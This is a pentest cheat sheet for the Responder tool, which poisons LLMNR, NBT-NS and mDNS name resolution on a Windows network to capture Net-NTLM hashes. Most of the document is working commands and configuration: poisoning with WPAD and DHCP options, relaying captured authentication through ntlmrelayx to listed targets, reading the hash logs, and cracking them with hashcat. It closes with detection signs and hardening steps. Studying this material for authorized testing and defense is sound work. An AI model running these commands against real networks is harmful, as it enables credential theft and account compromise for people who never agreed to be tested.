Responder is a LLMNR/NBT-NS/mDNS poisoner that captures NTLM authentication by responding to name resolution broadcasts on the local network. It's typically the first tool run during an internal pentest to passively collect credentials.
- Repo: https://github.com/lgandx/Responder
- Purpose: Poison name resolution, capture Net-NTLM hashes, serve rogue services
When a Windows machine fails DNS resolution, it falls back to:
- LLMNR (Link-Local Multicast Name Resolution) — multicast on 5355/UDP
- NBT-NS (NetBIOS Name Service) — broadcast on 137/UDP
- mDNS (Multicast DNS) — multicast on 5353/UDP
Responder listens for these broadcasts and responds as the requested host, causing the victim to authenticate to the attacker.
# Start Responder on the network interface
responder -I eth0 -dwv
# Flags:
# -I Interface
# -d Enable DHCP responses
# -w Enable WPAD proxy
# -v Verbose# Listen without poisoning — observe traffic
responder -I eth0 -AWhen using Responder with ntlmrelayx, you must disable Responder's built-in servers that conflict with ntlmrelayx:
; /usr/share/responder/Responder.conf (Kali default path)
; Or: /opt/Responder/Responder.conf
[Responder Core]
; Disable these — ntlmrelayx will handle them
SMB = Off
HTTP = Off
; Keep these enabled
SQL = On
FTP = On
POP = On
SMTP = On
IMAP = On
LDAP = On
DNS = On
DHCP = Offntlmrelayx needs to bind to ports 445 (SMB) and 80 (HTTP) to intercept authentication and relay it. If Responder is also binding to these ports, they'll conflict.
Responder still handles the poisoning — it just sends victims to ntlmrelayx's IP instead of its own servers.
# Terminal 1: ntlmrelayx (handles SMB/HTTP auth)
ntlmrelayx.py -tf targets.txt -smb2support
# Terminal 2: Responder (poisons, but doesn't serve SMB/HTTP)
responder -I eth0 -dwvResponder saves captured hashes to /usr/share/responder/logs/ (or wherever Responder is installed):
# View captured hashes
cat /usr/share/responder/logs/*.txt
# Format: username::domain:challenge:response:response
# Example:
# admin::CORP:1122334455667788:A1B2C3D4...:0101000000000000...# Net-NTLMv2 with hashcat
hashcat -m 5600 hashes.txt wordlist.txt
# Net-NTLMv1 with hashcat
hashcat -m 5500 hashes.txt wordlist.txt
# Net-NTLMv1 — can also recover NT hash via crack.sh
# Set Responder to downgrade to NTLMv1 (--lm flag, risky)# Enable WPAD for HTTP auth capture
responder -I eth0 -wFv
# -w Serve WPAD file
# -F Force NTLM auth on WPAD requests
# Victims requesting proxy config get redirected to authenticate# Respond to DHCPv6 requests (assigns IPv6 DNS)
responder -I eth0 -dResponder includes a legacy MultiRelay module, but ntlmrelayx is strongly preferred — it's more maintained and feature-rich.
- Always run in analyze mode (
-A) first to understand traffic patterns - Disable SMB and HTTP servers when using with ntlmrelayx
- Log locations change based on install path — check
Responder.confforSessionLog - Use
-vfor verbose output to see what's being poisoned - WPAD poisoning (
-w) can generate a lot of traffic — use carefully - Responder can cause disruption in production — poisoning legitimate name resolution can break services. Scope carefully.
- Hashes are captured per-user — you only need one response per user/machine
- LLMNR traffic from a single source responding to all queries
- NBT-NS responses from a non-standard host
- WPAD file served from an unexpected IP
- Multiple DNS suffix queries answered by the same IP
- Disable LLMNR: GPO → Computer Configuration → Administrative Templates → Network → DNS Client → Turn off multicast name resolution
- Disable NBT-NS: Network adapter settings → WINS → Disable NetBIOS over TCP/IP
- Disable mDNS: Not commonly needed; firewall port 5353
- Disable WPAD: GPO → Auto-detect proxy settings = Disabled, and remove WPAD DNS entries